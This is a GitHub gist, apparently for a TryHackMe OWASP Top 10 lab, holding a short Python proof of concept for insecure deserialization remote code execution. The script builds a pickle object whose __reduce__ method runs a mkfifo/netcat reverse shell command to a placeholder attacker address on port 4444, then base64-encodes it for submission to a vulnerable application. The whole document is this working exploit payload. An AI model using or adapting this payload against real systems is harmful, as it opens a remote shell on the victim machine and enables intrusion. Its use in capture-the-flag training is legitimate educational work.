Skip to content

Instantly share code, notes, and snippets.

@tobiadegoke
Forked from CMNatic/cloudSettings
Created December 6, 2020 20:23
Show Gist options
  • Save tobiadegoke/cd208f1685fd3e729b0ee8fe7885da87 to your computer and use it in GitHub Desktop.
Save tobiadegoke/cd208f1685fd3e729b0ee8fe7885da87 to your computer and use it in GitHub Desktop.
TryHackMe OWASP-10-A8: Insecure Deserialization RCE PoC
import pickle
import sys
import base64
command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat YOUR_TRYHACKME_VPN_IP 4444 > /tmp/f'
class rce(object):
def __reduce__(self):
import os
return (os.system,(command,))
print(base64.b64encode(pickle.dumps(rce())))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment